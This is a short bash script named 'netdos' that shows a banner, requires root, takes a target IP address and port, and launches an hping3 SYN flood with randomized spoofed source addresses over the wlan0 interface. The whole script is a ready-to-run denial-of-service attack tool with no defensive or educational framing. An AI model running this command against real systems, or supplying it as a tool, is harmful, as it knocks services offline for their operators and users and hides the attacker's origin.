#!/bin/bash

clear

color_banner() {
echo -e "\033[1;34m      ███╗   ██╗███████╗████████╗██████╗  ██████╗ ███████╗      
▄ ██╗▄████╗  ██║██╔════╝╚══██╔══╝██╔══██╗██╔═══██╗██╔════╝▄ ██╗▄
 ████╗██╔██╗ ██║█████╗     ██║   ██║  ██║██║   ██║███████╗ ████╗
▀╚██╔▀██║╚██╗██║██╔══╝     ██║   ██║  ██║██║   ██║╚════██║▀╚██╔▀
  ╚═╝ ██║ ╚████║███████╗   ██║   ██████╔╝╚██████╔╝███████║  ╚═╝ 
      ╚═╝  ╚═══╝╚══════╝   ╚═╝   ╚═════╝  ╚═════╝ ╚══════╝      
================================================================\033[0m"
}

color_banner

if [ "$EUID" -ne 0 ]; then
    echo "Please run as root (use sudo)."
    exit 1
fi

if [ $# -ne 2 ]; then
    echo -e "Usage: netdos <ip_address> <port>\e[0m"
    exit 1
fi

ip_address=$1
port=$2

hping3 --flood --interface wlan0 -p $port -S --rand-source $ip_address 